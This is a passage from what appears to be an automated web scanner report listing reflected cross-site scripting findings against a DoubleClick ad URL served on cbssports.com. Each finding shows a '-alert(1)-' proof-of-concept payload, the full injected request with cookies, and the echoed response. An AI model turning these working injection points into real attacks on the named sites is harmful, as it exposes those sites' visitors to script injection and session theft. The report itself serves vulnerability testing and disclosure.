GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
dlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium
...[SNIP]...

3.7. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e3d"-alert(1)-"11d37b6a276 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:40 GMT
Expires: Wed, 27 Apr 2011 23:22:40 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.8. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524b6"-alert(1)-"8ae5f73bf70 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214
...[SNIP]...

3.9. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f578"-alert(1)-"41bdc1636cb was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0G
...[SNIP]...

3.10. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45614"-alert(1)-"a1b1ccad763 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23
...[SNIP]...

3.11. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ea"-alert(1)-"2bbb3a752bd was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
7/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.19
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b433b"-alert(1)-"a8247191af was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4871

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e78"-alert(1)-"f7448d9e721 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97493"-alert(1)-"ee5fa11b092 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.15. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12978"-alert(1)-"e22432d472d was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
07108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo
...[SNIP]...

3.16. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65cd9"-alert(1)-"c00625812dd was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
